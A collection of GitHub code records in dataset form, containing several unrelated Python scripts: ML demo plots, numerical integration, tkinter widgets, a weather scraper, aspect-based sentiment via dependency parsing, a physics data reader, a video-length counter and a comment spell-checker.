click_function_checkbox(self):\n\t\tself.plt_truefunc.set_visible(self.show_function.get())\n\t\tplt.draw()\n\n\tdef click_model_checkbox(self):\n\t\tself.plt_model.set_visible(self.show_model.get())\n\t\tself.txt.set_visible(self.show_model.get())\n\t\tplt.draw()\n\n\tdef select_model_type(self,event):\n\t\tselected_model = self.selected_model.get()\n\t\tmetamodel_info = self.metamodel_info[selected_model]\n\t\tparam_space = list(metamodel_info['param_space'])\n\n\t\t# update the param combo\n\t\tlabel = self.param_input.children['!label']\n\t\tlabel['text'] = metamodel_info['param']\n\n\t\tcombo = self.param_input.children['!combobox']\n\t\tcombo['values'] = param_space\n\n\t\tself.paramstr.set(param_space[0])\n\t\tself.param.set(param_space[0])\n\n\t\tself.build_model()\n\t\tself.update_figure()\n\n\tdef select_model_param(self,event):\n\t\ttry:\n\t\t\tself.param.set(int(self.paramstr.get()))\n\t\t\tself.build_model()\n\t\t\tself.update_figure()\n\t\t\treturn True\n\t\texcept ValueError:\n\t\t\treturn False\n\n\tdef click_sweep_checkbox(self):\n\t\tself.ax[1].set_visible(self.show_sweep.get())\n\t\tplt.draw()\n\n\tdef build_model(self):\n\n\t\tXtrain, Ytrain = self.Dtrain\n\n\t\tif Xtrain.shape[0]==0:\n\t\t\tself.metamodel = None\n\t\t\treturn\n\n\t\tselected_model = self.selected_model.get()\n\t\tparam_space = self.metamodel_info[selected_model]['param_space']\n\n\t\tif selected_model=='K-bins':\n\t\t\tself.metamodel = MetaKBins(param_space, self.Dtrain, self.Dtest)\n\n\t\tif selected_model=='KNN':\n\t\t\tself.metamodel = MetaKNN(param_space, self.Dtrain, self.Dtest)\n\n\t\tif selected_model == 'Linear regression':\n\t\t\tself.metamodel = MetaLinearRegression(param_space, self.Dtrain, self.Dtest)\n\n\tdef eval_model(self,X):\n\t\tif len(X)==0:\n\t\t\treturn np.nan\n\t\tif self.metamodel is None:\n\t\t\treturn np.empty(X.shape[0])\n\n\t\treturn self.metamodel.predict(self.param.get(), X)\n\n\tdef format_string(self):\n\n\t\tif self.metamodel is None:\n\t\t\treturn ''\n\n\t\tparam = self.param.get()\n\t\tind, = np.where(self.metamodel.param_space == param)\n\t\tselected_model = self.selected_model.get()\n\t\tparamname = self.metamodel_info[selected_model]['param']\n\t\ttrain_MSE, train_MAE, train_MAPE, train_R2 = self.metamodel.train_perf[ind[0],:]\n\t\ttest_MSE, test_MAE, test_MAPE, test_R2 = self.metamodel.test_perf[ind[0],:]\n\n\t\tif self.Ntest.get()==0:\n\t\t\treturn \"{} = {}\\ntrain MSE = {:.3f}\\ntrain MAE = {:.3f}\\ntrain MAPE = {:.3f}\\ntrain R2 = {:.3f}\"\\\n\t\t\t\t.format(paramname,param,train_MSE,train_MAE, train_MAPE, train_R2)\n\n\t\telse:\n\t\t\treturn \"{} = {}\\ntrain MSE = {:.3f}\\ntrain MAE = {:.3f}\\ntrain MAPE = {:.3f}\\ntrain R2 = {:.3f}\\ntest MSE = {:.3f}\\ntest MAE = {:.3f}\\ntest MAPE = {:.3f}\\ntest R2 = {:.3f}\"\\\n\t\t\t\t.format(paramname,param,train_MSE,train_MAE, train_MAPE, train_R2,test_MSE, test_MAE, test_MAPE, test_R2 )\n\n\tdef make_sweep_plot(self,ax):\n\t\tax.clear()\n\n\t\tif self.metamodel is None:\n\t\t\tparam_space = np.arange(10)\n\t\t\tloss_train = np.full(len(param_space), np.nan)\n\t\t\tloss_test = np.full(len(param_space), np.nan)\n\t\telse:\n\t\t\tparam_space = self.metamodel.param_space\n\t\t\tloss_train = self.metamodel.train_perf[:,0]\n\t\t\tloss_test = self.metamodel.test_perf[:,0]\n\n\t\tself.train_plt, = ax.plot(param_space, loss_train, 'o-', c='b',\n\t\t\t\t\t\t\t\t linewidth=3, markersize=14, label='training MSE')\n\t\tself.test_plt, = ax.plot(param_space, loss_test, 'o-', c='r',\n\t\t\t\t\t\t\t\t linewidth=3, markersize=14, label='test MSE')\n\t\tax.legend(fontsize=28, loc='upper left')\n\t\tax.spines['right'].set_visible(False)\n\t\tax.spines['left'].set_visible(False)\n\t\tax.spines['bottom'].set_visible(False)\n\t\tax.spines['top'].set_visible(False)\n\t\tax.set_xticks(param_space)\n\t\tax.tick_params(axis='x', labelsize=24)\n\t\tax.tick_params(axis='y', labelsize=24)\n\t\tselected_model = self.selected_model.get()\n\t\tparamname = self.metamodel_info[selected_model]['param']\n\t\tax.set_xlabel(paramname, fontsize=30)\n\t\tax.grid(linestyle=':', linewidth=2)\n\n####################################################\nif __name__ == \"__main__\":\n\tapp = TkContainer()\n\ttk.mainloop()\n","repo_name":"m0zzaR/Statistics-And-Data-Science-for-Engineers","sub_path":"demos/demo_suplearn.py","file_name":"demo_suplearn.py","file_ext":"py","file_size_in_byte":16809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39752339811","text":"\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nx = np.array([ind * 0.25 for ind in range(0, 9)])\nf = np.array([ 1.0, 0.989616, 0.958851, 0.908852,\n 0.841471, 0.759188, 0.664997, 0.562278, 0.454649 ])\n\ndef calc_integral_trapezoid(x, f, scaling_factor: int = 1, points: list = []):\n sum = 0\n for ind in range((len(x) - 1)//scaling_factor):\n cur_heap = scaling_factor*ind \n next_hep = scaling_factor*(ind +1)\n points.append((f[cur_heap] + f[next_hep])*(x[next_hep] - x[cur_heap])/2)\n sum += points[-1]\n # print(cur_heap, next_hep)\n return sum\n\n\ndef calc_integral_simpson(x, f):\n sum = 0\n h = x[1] - x[0]\n for ind in range(1, (len(x) + 1)//2):\n sum += f[2*ind - 1]\n sum *= 4\n\n for ind in range(1, (len(x) + 1)//2 - 1):\n sum += f[2*ind]*2\n sum += f[0] + f[len(f) - 1]\n return sum*h/3\n\ndef richardson_correction(I_h, I_2h, p: int = 2):\n corr_int = I_h + (I_h - I_2h)/(2**p - 1)\n return corr_int \n\n_F_ = '{:.7}'\n\nif __name__ == '__main__':\n # print(len(x))\n print(('Trapezoid method: h - '+_F_+', 2h - '+_F_+'').format(calc_integral_trapezoid(x, f), calc_integral_trapezoid(x, f, 2)))\n print('Trapezoid method with correction: '+_F_.format(richardson_correction(calc_integral_trapezoid(x, f), calc_integral_trapezoid(x, f, 2))))\n print(('Simpson\\'s method = '+_F_).format(calc_integral_simpson(x, f)))\n\n int_step = []\n calc_integral_trapezoid(x, f, 1, int_step)\n plt.figure(figsize=(16/2,9/2))\n\n plt.xlabel('x')\n plt.ylabel('f(x)')\n plt.plot(x, f, marker='o')\n plt.stem(x[:len(int_step)], int_step, 'g')\n plt.legend(['f(x)', '$\\\\frac{[f(x_{i+1}) + f(x_{i})] \\cdot h}{2}$'], fontsize=\"17\")\n plt.grid()\n plt.tight_layout()\n \n plt.gcf().set_dpi(100)\n plt.show()\n","repo_name":"UniverTime/CalcMath","sub_path":"lab5/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17798644629","text":"import tkinter as tk\nclass CustomListBox(tk.Listbox):\n\n def __init__(self, master=None, on_motion=print, on_click=print, *args, **kwargs):\n tk.Listbox.__init__(self, master, *args, **kwargs)\n self.current = 0\n self.last = None\n self.motion_func = on_motion\n self.click_func = on_click\n self.bind(\"\", self.on_motion)\n self.bind(\"<>\", self.on_click)\n\n def on_motion(self, event):\n index = self.index(f\"@{event.x},{event.y}\")\n self.current = index\n if self.last != self.current :\n data = self.get(self.current)\n self.motion_func(data) \n self.last = self.current\n def on_click(self, event):\n selection = event.widget.curselection()\n if selection:\n index = selection[0]\n data = event.widget.get(index)\n self.click_func(data)\n\nif __name__ == \"__main__\":\n root = tk.Tk()\n txt = tk.Label(root, text=\"a\")\n listbox = CustomListBox(root, on_motion=lambda x: txt.config(text=x))\n listbox.pack()\n txt.pack()\n listbox.insert(\"end\", \"one\", \"two\", \"three\", \"four\", \"five\")\n \n root.mainloop()","repo_name":"Redst0neFlux/dice-grapher","sub_path":"hoverselect.py","file_name":"hoverselect.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24466804816","text":"from bs4 import BeautifulSoup as bs\r\nfrom datetime import datetime, timedelta\r\nimport requests\r\n\r\n\r\ndef parse_naver_weather(elements): # 네이버날씨를 파싱하여 오전/오후의 기온을 반환하는 함수\r\n data = []\r\n for e in elements:\r\n inners = e.findAll(\"span\", {\"class\": \"weather_inner\"})\r\n rainAM = inners[0].find(\"span\", {\"class\": \"rainfall\"}).text\r\n rainPM = inners[1].find(\"span\", {\"class\": \"rainfall\"}).text\r\n tempAM = e.find(\"span\", {\"class\": \"lowest\"}).find(string=True, recursive=False)\r\n tempPM = e.find(\"span\", {\"class\": \"highest\"}).find(string=True, recursive=False)\r\n foo = \"%9s\" % tempAM + \"%9s\" % rainAM + \"%9s\" % tempPM + \"%9s\" % rainPM\r\n data.append(foo)\r\n return data\r\n\r\n\r\ndef main():\r\n # 네이버 날씨를 크롤링합니다.\r\n html = requests.get(\r\n \"https://search.naver.com/search.naver?sm=tab_hty.top&where=nexearch&query=%EC%A7%84%EC%A3%BC%EC%8B%9C+%EA%B8%88%EC%82%B0%EB%A9%B4+%EB%82%A0%EC%94%A8&oquery=%EC%A7%84%EC%A3%BC+%EB%82%A0%EC%94%A8&tqi=h9vXClprvOsssS4lLrZssssssjs-396297\"\r\n )\r\n base_url = \"https://m.search.naver.com/p/csearch/content/nqapirender.nhn?where=nexearch&pkid=227&u1=03170410&key=weather\"\r\n\r\n url = base_url\r\n # urls = base_url\r\n\r\n r = requests.get(url)\r\n html = str(r.json()[\"weekly\"])\r\n soup = bs(html, \"html5lib\")\r\n lis = soup.findAll(\"li\")\r\n result = parse_naver_weather(lis)\r\n\r\n # 사용할 날짜를 구합니다(오늘 포함 총 7일).\r\n weeks = [\"일\", \"월\", \"화\", \"수\", \"목\", \"금\", \"토\"]\r\n dt = datetime.now().date()\r\n dates7 = [\r\n (dt + timedelta(days=i)).strftime(\"%m/%d\")\r\n + \"(\"\r\n + weeks[int((dt + timedelta(days=i)).strftime(\"%w\"))]\r\n + \")\"\r\n for i in range(7)\r\n ]\r\n\r\n print(\"%20s\" % \"오전\" + \"%16s\" % \"오후\")\r\n print('%16s'%'기온'+'%7s'%'강수'+'%7s'%'기온'+'%7s'%'강수')\r\n for i in range(7):\r\n print(dates7[i] + result[i])\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"7829hw/weather_for_rokaf_treaning_wing","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19945138129","text":"import textblob\nfrom textblob import TextBlob\nimport numpy as np\nfrom gensim.models.fasttext import FastText\nimport nltk \nfrom nltk.stem import WordNetLemmatizer\nimport stanza \nfrom article_preprocessing import *\n\nnltk.download('wordnet')\n\n\nlemmatizer = WordNetLemmatizer()\n\nimport stanza \nfrom sentiment_config import * \nfrom model import get_word_polarity, get_sentiment, get_senti_coeff_indic, sentiment_coeff\n\nstanza.download('en')\nstanza.download('hi')\nstanza.download('ta')\nstanza.download('te')\nstanza.download('mr')\n\n\n# function to find polar words in a sentence using dependency tree\n# take the aspect term, a sentence from the article and language_code \ndef polar_dependency_tree(aspect_term, article_line, lang_code): \n # handling the different languages for which the module can work \n if lang_code == 'en':\n nlp = stanza.Pipeline('en')\n if lang_code == 'hi':\n nlp = stanza.Pipeline('hi')\n if lang_code == 'mr':\n nlp = stanza.Pipeline('mr')\n if lang_code == 'te':\n nlp = stanza.Pipeline('te')\n if lang_code == 'ta':\n nlp = stanza.Pipeline('ta')\n \n # using stanza pipeline to perform dependency parsing\n article_line = nlp(article_line)\n sentence = article_line.sentences[0]\n # list of dependency relations which can have polar words \n relations = ['acl', 'advcl', 'advmod', 'amod', 'xcomp', 'neg', 'parataxis', 'ccomp']\n # parts of speech tags that can have polar words \n pos_tags = ['VERB', 'ADJ']\n entity_present = False\n \n # checking if the entity is present or not.\n for word in sentence.words:\n if word.text == aspect_term:\n entity = word\n entity_present = True\n if entity_present == False:\n return []\n \n # list of polar words with respect to the entity\n polar_words = []\n # Case 1: our entity is the root term, so checkout all the child nodes \n if entity.deprel == 'root':\n for word in sentence.words:\n if (word.head == int(entity.id) and (word.deprel in relations or word.upos in pos_tags)):\n polar_words.append(word.text)\n # Case 2: our entity is not the root term, so traceback the path of the tree from entity to root.\n # also check all the other child nodes after finding the root \n else:\n for word in sentence.words:\n if word.deprel == 'root':\n root_node = word\n # checking the child nodes of the root \n for word in sentence.words:\n if (word.head == int(root_node.id) and (word.deprel in relations or word.upos in pos_tags)):\n polar_words.append(word.text)\n # tracing the path from entity to the root node \n current_word = entity\n while(current_word.deprel != 'root'):\n current_word = sentence.words[current_word.head - 1]\n if (current_word.deprel in relations or current_word.upos in pos_tags):\n polar_words.append(current_word.text)\n \n return list(set(polar_words)) \n\n\ndef get_polarity_dep_tree(aspect_term, sentences, lang_code,model=None ):\n\tpolarity = 0\n\tif lang_code == 'en':\n\t\taspect_term = spacy_tokenizer(aspect_term)\n\tif lang_code == 'hi':\n\t\taspect_term = tokenize_hin(aspect_term)\n\tfor sentence in sentences:\n\t\tif lang_code in ['en', 'hi']:\n\t\t\tpolar_words_tot = []\n\t\t\tfor term in aspect_term:\n\t\t\t\tpolar_words = polar_dependency_tree(term, sentence, lang_code)\n\t\t\t\tpolar_words_tot.extend(polar_words)\n\t\t\tpolar_words_tot = list(set(polar_words_tot))\n\t\t\tif len(polar_words_tot) > 0:\n\t\t\t\tif lang_code == 'en':\n\t\t\t\t\tsenti_vector = sentiment_coeff(polar_words_tot)\n\t\t\t\tif lang_code == 'hi':\n\t\t\t\t\tsenti_vector = get_senti_coeff_indic(polar_words_tot, lang_code, model)\n\t\t\t\tsentiment = sum(senti_vector)\n\t\t\t\tpolarity = polarity + sentiment\n\t\t\telse:\n\t\t\t\tpolarity = polarity + 0\n\t\telse:\n\t\t\tpolar_words = polar_dependency_tree(aspect_term, sentence, lang_code)\n\t\t\tif len(polar_words) > 0:\n\n\t\t\t\tsenti_vector = get_senti_coeff_indic(polar_words,lang_code, model)\n\t\t\t\tsentiment = sum(senti_vector)\n\t\t\t\tpolarity = polarity + sentiment\n\t\t\telse:\n\t\t\t\tpolarity = polarity + 0 \n\t\t\n\tif polarity > 0:\n\t\treturn 1\n\telif polarity == 0:\n\t\treturn 0\n\telse:\n\t\treturn -1 ","repo_name":"AchintyaX/ABSA_Indic","sub_path":"ABSA_Dependency_Tree.py","file_name":"ABSA_Dependency_Tree.py","file_ext":"py","file_size_in_byte":4198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40023314335","text":"# You have two types of tiles: a 2 x 1 domino shape and a tromino shape. You may rotate these shapes.\n\n\n# Given an integer n, return the number of ways to tile an 2 x n board. Since the answer may be very large, return it modulo 109 + 7.\n\n# In a tiling, every square must be covered by a tile. Two tilings are different if and only if there are two 4-directionally adjacent cells on the board such that exactly one of the tilings has both squares occupied by a tile.\n\n \n\n# Example 1:\n\n\n# Input: n = 3\n# Output: 5\n# Explanation: The five different ways are show above.\n# Example 2:\n\n# Input: n = 1\n# Output: 1\n\n\nclass Solution:\n def numTilings(self, n: int) -> int:\n mod = 1000000007\n dp = [[0,0,0,0] for i in range(n+1)]\n \n def makeState(t1, t2):\n if not t1 and not t2:\n return 0\n elif not t1 and t2:\n return 1\n elif t1 and not t2:\n return 2\n else:\n return 3\n \n def solve(i, t1, t2):\n \n if i == n:\n return 1\n state = makeState(t1, t2)\n if dp[i][state] != 0:\n return dp[i][state]\n count = 0\n t3 = t4 = True if i+1 ak.Array:\n \"\"\" Computes the total energy of a supercluster from an array of supercluster ids \n Preserves the inner index (usually CP id)\n Parameters :\n - supercls_ts_idxs : type nevts * var * var * uint64\n Returns : type nevts * var * float (energy sum)\n \"\"\"\n # FIrst flatten the inner dimension (CP id) before taking tracksters\n energies_flat = tracksters.raw_energy[ak.flatten(supercls_ts_idxs, axis=-1)]\n # Rebuild the inner index\n energies = ak.unflatten(energies_flat, ak.flatten(ak.num(supercls_ts_idxs, axis=-1)), axis=-1)\n\n return ak.sum(energies, axis=-1)\n\n\n\n \nclass DumperReader:\n class MultiFileReader:\n def __init__(self, files:list[uproot.ReadOnlyDirectory]):\n self.files = files\n \n def __getitem__(self, key):\n excpts = []\n for file in self.files:\n try:\n return file[key]\n except uproot.KeyInFileError as e:\n excpts.append(e)\n raise KeyError(*excpts)\n \n def __init__(self, file:str|uproot.ReadOnlyDirectory|list[uproot.ReadOnlyDirectory], directoryName:str=\"ticlDumper\") -> None:\n try:\n self.fileDir = file[directoryName]\n except TypeError:\n try:\n self.fileDir = self.MultiFileReader([f[directoryName] for f in file])\n except TypeError:\n self.fileDir = uproot.open(file + \":\" + directoryName)\n \n @property\n def nEvents(self):\n return self.fileDir[\"tracksters\"].num_entries\n\n @cached_property\n def tracksters(self) -> ak.Array:\n return self.fileDir[\"tracksters\"].arrays()\n \n @cached_property\n def tracksters_zipped(self) -> ak.Array:\n return ak.zip({\"ts_id\" : ak.local_index(self.tracksters.raw_energy, axis=1)} | \n {key : self.tracksters[key] for key in self.tracksters.fields \n if key not in [\"event\", \"NClusters\", \"NTracksters\"]},\n depth_limit=2, # don't try to zip vertices\n with_name=\"tracksters\"\n )\n\n @cached_property\n def simTrackstersCP(self) -> ak.Array:\n return self.fileDir[\"simtrackstersCP\"].arrays(filter_name=[\"raw_energy\", \"raw_energy_em\", \"regressed_energy\", \"barycenter_*\"])\n @cached_property\n def simTrackstersCP_df(self) -> pd.DataFrame:\n return ak.to_dataframe(self.simTrackstersCP, levelname=lambda x : {0:\"eventInternal\", 1:\"caloparticle_id\"}[x])\n \n @cached_property\n def superclusters(self) -> ak.Array:\n \"\"\" Gets the supercluster trackster ids\n type: nevts * var (superclsCount) * var (trackstersInSupercls) * uint64 (trackster id)\n \"\"\"\n return self.fileDir[\"superclustering/superclusteredTracksters\"].array()\n \n @cached_property\n def superclusters_all(self) -> ak.Array:\n \"\"\" Same as superclusters but tracksters not in a supercluster are included in a one-trackster supercluster each\n \"\"\"\n return self.fileDir[\"superclustering/superclusteredTrackstersAll\"].array()\n\n @cached_property\n def superclusteringDnnScore(self) -> ak.Array:\n return self.fileDir[\"superclustering/superclusteringDNNScore\"].array()\n\n @cached_property\n def associations(self) -> ak.Array:\n return self.fileDir[\"associations\"].arrays(filter_name=\"tsCLUE3D_*\")\n \n \n @cached_property\n def supercluster_df(self) -> pd.DataFrame:\n return ak.to_dataframe(self.superclusters, anonymous=\"ts_id\",\n levelname=lambda x : {0:\"eventInternal\", 1:\"supercls_id\", 2:\"ts_in_supercls_id\"}[x])\n\n @cached_property\n def supercluster_all_df(self) -> pd.DataFrame:\n \"\"\" Same as superclusters_df but tracksters not in a supercluster are included in a one-trackster supercluster each\n \"\"\"\n return ak.to_dataframe(self.superclusters_all, anonymous=\"ts_id\",\n levelname=lambda x : {0:\"eventInternal\", 1:\"supercls_id\", 2:\"ts_in_supercls_id\"}[x])\n \n @cached_property\n def supercluster_merged_properties_all(self) -> pd.DataFrame:\n \"\"\" Dataframe holding supercluster properties (one row per supercluster) \n \n Tracksters not in a supercluster are included as one-trackster superclusters\n \"\"\"\n return (supercluster_joinTracksters(self.supercluster_all_df, self.tracksters_zipped[[\"raw_energy\", \"regressed_energy\"]])\n .groupby(level=[\"eventInternal\", \"supercls_id\"])\n .agg(\n raw_energy_supercls=pd.NamedAgg(\"raw_energy\", \"sum\"),\n regressed_energy_supercls=pd.NamedAgg(\"regressed_energy\", \"sum\"),\n ))\n \n @cached_property\n def assocs_bestScore_simToReco_df(self) -> pd.DataFrame:\n \"\"\" Make a Df of largest score associations of each SimTrackster \n \n Index eventInternal\tts_id, column : caloparticle_id\n \"\"\"\n # Get largest association score\n assocs_simToReco_largestScore = assocs_bestScore(assocs_zip_simToReco(self.associations))\n # Make a df out of it : index eventInternal\tts_id, column : caloparticle_id\n return (ak.to_dataframe(assocs_simToReco_largestScore[[\"ts_id\", \"caloparticle_id\", \"score\", \"sharedE\"]], \n levelname=lambda x : {0:\"eventInternal\", 1:\"caloparticle_id_wrong\"}[x])\n .reset_index(\"caloparticle_id_wrong\", drop=True)\n .set_index(\"caloparticle_id\", append=True)\n )\n \n def assocs_bestScore_recoToSim_df(self, dropOnes=True) -> pd.DataFrame:\n \"\"\" Make a Df of largest score associations of each Trackster \n \n Parameters : \n - dropOnes : if True, do not include associations of score 1 (worst score)\n Index eventInternal\tcaloparticle_id, column : ts_id, score, sharedE\n \"\"\"\n # Get largest association score\n assocs = assocs_bestScore((assocs_dropOnes if dropOnes else lambda x:x)(assocs_zip_recoToSim(self.associations)))\n # Make a df out of it : index eventInternal\tts_id, column : caloparticle_id\n return (ak.to_dataframe(assocs[[\"ts_id\", \"caloparticle_id\", \"score\", \"sharedE\"]], \n levelname=lambda x : {0:\"eventInternal\", 1:\"ts_id_wrong\"}[x])\n .reset_index(\"ts_id_wrong\", drop=True)\n .set_index(\"ts_id\", append=True)\n )\n \n \n\n\n\n","repo_name":"tcuisset/HgcalSuperclustering","sub_path":"analyzer/dumperReader/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":6698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33212419882","text":"import os\nfrom sty import fg, rs \nimport pyfiglet\nfrom mutagen.mp4 import MP4\n\n# Static\ndir_path = os.path.dirname(os.path.realpath(__file__)) \nfile_extensions = ('mp4')\n\ndef main():\n ##Clear the screen first\n print('\\033c')\n #program start\n printCoursesView()\n\n'''\nWalks throw the sub-directories and grap the .mp4 files only mappes to \nthis course directory\n'''\ndef recursiveTimeCounter( directory ):\n totalTime = 0\n for subdir, dirs, files in os.walk(directory):\n for file in files:\n if( file.lower().endswith(file_extensions) ):\n totalTime += getTimeInSeconds(dir_path + '\\\\' + subdir + '\\\\' + file , \"mp4\")\n\n return convertSecondsIntoHMS(totalTime)\n\n'''\nConvert the time from seconds into hours:minuts:seconds format\n'''\ndef convertSecondsIntoHMS( seconds ):\n seconds, sec = divmod(seconds, 60)\n hr, min = divmod(seconds, 60)\n return str( \"%d:%02d:%02d\" % (hr, min, sec) )\n\n'''\nGets the time of the video file \n'''\ndef getTimeInSeconds( filename, type ):\n if( type == 'mp4' ):\n return MP4(filename).info.length\n\n\n'''\nPrint the logo screen and the table adjucements\n'''\ndef printCoursesView( ):\n #Print the art name Dooglas\n print(pyfiglet.figlet_format('DOOGLAS') )\n print(fg.red + '{:#<70}'.format(\"#\") + fg.rs)\n print(fg.red + '{: ^49}'.format(\"Courses\") + fg.rs,end='')\n print(fg.red + '|{: ^20}'.format(\"Time\") + fg.rs)\n print(fg.red + '{:#<70}'.format(\"#\") + fg.rs)\n items = []\n for item in os.listdir(dir_path):\n if not os.path.isfile(os.path.join(dir_path, item)):\n print( fg.yellow + '{: <43}'.format(\" - \" + item) + fg.rs, end='')\n print( fg.red + '{: ^13}'.format('|') + fg.rs, end='')\n print ( fg.green + recursiveTimeCounter(item) + fg.rs )\n\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"aa-ahmed-aa/Dooglas","sub_path":"dooglas.py","file_name":"dooglas.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16242616818","text":"import cv2\nimport numpy as np\nimport tensorflow as tf\nimport keras\n\nclass age_detector:\n\n def __init__(self):\n self.age_model = tf.keras.models.load_model('models/age_model.h5')\n self.label_to_age_map = {\n 0: '0-2',\n 1: '4-6',\n 2: '8-13',\n 3: '15-20',\n 4: '25-32',\n 5: '38-43',\n 6: '48-53',\n 7: '60+'\n }\n\n def detect_age(self, img_face):\n try:\n \"\"\"\n MODEL_MEAN_VALUES = (78.4263377603, 87.7689143744, 114.895847746)\n ageList = ['(0-2)', '(4-6)', '(8-12)', '(15-20)', '(25-32)', '(38-43)', '(48-53)', '(60-100)']\n img_blob = cv2.dnn.blobFromImage(img_face, 1.0, (227,227), MODEL_MEAN_VALUES, swapRB=False)\n self.age_model.setInput(img_blob)\n age_class = self.age_model.forward()\n age = ageList[age_class[0].argmax()]\n \"\"\"\n gray = cv2.cvtColor(img_face, cv2.COLOR_BGR2GRAY)\n resized = cv2.resize(gray, (32, 32))\n normalized = resized / 255.0\n reshaped = np.reshape(normalized, (1, 32, 32, 1))\n result = self.age_model.predict(reshaped)\n label = np.argmax(result, axis=1)[0]\n age = self.label_to_age_map[label]\n return age\n except Exception as e:\n print(str(e))\n return 'UNDETECTED'\n\n\n\n\n","repo_name":"kretmatt/InnovationLab3","sub_path":"utils/age.py","file_name":"age.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6222138099","text":"# Definition for a binary tree node\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n# self.next = None\n\nclass Solution:\n # @param root, a tree node\n # @return nothing\n def dfs(self, node):\n if node is None:\n return\n if node.left is None and node.right is None:\n return\n \n tmp = node.next\n got = None\n while not tmp is None:\n if not tmp.left is None:\n got = tmp.left\n break\n elif not tmp.right is None:\n got = tmp.right\n break\n tmp = tmp.next\n \n if not node.left is None:\n if not node.right is None:\n node.left.next = node.right\n node.right.next = got\n else:\n node.left.next = got\n else:\n node.right.next = got\n \n \n self.dfs(node.right)\n self.dfs(node.left)\n \n def connect(self, root):\n self.dfs(root)\n","repo_name":"Shuaiyicao/leetcode-python","sub_path":"117.py","file_name":"117.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"42407189641","text":"## Name: Deepak Vadithala\n## Course: MSc Data Science\n## Submission Date: 13-Feb-2017\n\n## Please note: Inline comments explains the reasoning and the logic\n## Also, I have written test cases within each function. \n## You can uncomment to test these cases. And I have used two helper\n## function instead of repeating the code.\n\n##================================================================\nimport os as os\n\n\n##================================================================\ndef isWordCharacter(ch) :\n \n return (ch >= \"A\" and ch <= \"Z\" or ch >= \"a\" and ch <= \"z\")\n##================================================================\n\n\n##================================================================\ndef getFullLineComments(filename) :\n# Please note: This is a helper function which used as an input \n# into other functions. This function returns ONLY full comment lines \n myLineCounter = 0\n myFile = open(filename, 'r')\n myOutputDictionary = {}\n\n# Loops through each line in the file and looks for only the commented\n# lines. And stored the commented lines along with the line number in \n# the dictionary\n for myLine in myFile :\n myLineCounter = myLineCounter + 1\n if (myLine.find('#') >= 0) :\n if (myLine.lstrip()[0] == '#') :\n myOutputDictionary[myLineCounter] = myLine.strip()\n\n myFile.close()\n\n return myOutputDictionary\n# print(getFullLineComments('pythoncode.py'))\n##================================================================\n\n\n##================================================================\ndef countFullLineComments(filename) :\n# Using getFullLineComments() which is define above\n return len(getFullLineComments(filename))\n# print(countFullLineComments('pythoncode.py'))\n##================================================================\n\n\n##================================================================\ndef readInRealWords(filename):\n myInputFile = open(filename, 'r')\n myLoopCounter = 0\n myOutputSet = set()\n myCurrentLine = myInputFile.readline()\n\n# Looping through each line and storing iteration number in\n# the myLoopCounter variable. And myLoopCounter variable's length \n# is used to determine the index of the words.\n while myCurrentLine != '':\n myLoopCounter = myLoopCounter + 1\n myOutputSet.add(myCurrentLine[7 + len(str(myLoopCounter)) : ].strip().lower())\n myCurrentLine = myInputFile.readline()\n\n myInputFile.close()\n \n return myOutputSet\n# print(len(readInRealWords('linenumberwords.txt')))\n##================================================================\n\n\n##================================================================\ndef getWord(s):\n myInputString = str(s).rstrip()\n myStringIndexList = []\n myLoopCounter = 0\n\n# Using isWordCharacter() to evaluate each character in the input string \n# and isWordCharacter() returns True or False. Storing the index position\n# of each character in myStringIndexList and then using min and max\n# to get the index position.\n\n for myChar in myInputString:\n myLoopCounter = myLoopCounter + 1\n if (isWordCharacter(myChar)):\n myStringIndexList.append(myLoopCounter)\n\n if len(myStringIndexList) == 0:\n return ' '\n else:\n return myInputString[min(myStringIndexList) - 1: max(myStringIndexList) ]\n\n# Some unit test cases. Please uncomment the print statements to test.\n\n# print(getWord(\" !,Word’s** \"))\n# print(getWord(\" !,Word’** \"))\n# print(getWord(\" !,’** \"))\n# print(getWord(\" !,’** dog'\"\" \\\\'''\"))\n##================================================================\n\n\n##================================================================\ndef convertLineToWordHelper(inputDictionary, outputFormat) :\n\n# Helper function which returns dictionary/set based on the outputFormat\n# This function is used in Q4 or spellCheckComments()\n\n myOutputSet = set()\n myValueKeyPair = {}\n myLowerUpperWordsDict = {}\n\n for myKey, myValue in inputDictionary.items():\n for eachWord in myValue.split():\n myOutputSet.add(getWord(eachWord).lower())\n myValueKeyPair[getWord(eachWord).lower()] = myKey\n myLowerUpperWordsDict[getWord(eachWord).lower()] = getWord(eachWord)\n # print(myLowerUpperWordsDict)\n\n myOutputSet.remove(' ')\n\n if outputFormat == 'set' :\n return myOutputSet\n elif outputFormat == 'valueKey' :\n return myValueKeyPair\n elif outputFormat == 'lowerUpper' :\n return myLowerUpperWordsDict\n##================================================================\n\n\n##================================================================\ndef spellCheckComments(filename,correctlySpelledWords) :\n # Notes: Instead of repeating the code. I have used functions\n # 1, 2 and 3 along with the helper functions. T\n\n myCorrectlySpelledWordSet = correctlySpelledWords\n\n # getFullLineComments is a helper function which returns only commented\n # lines front the code\n myCommentWordsDictionary = 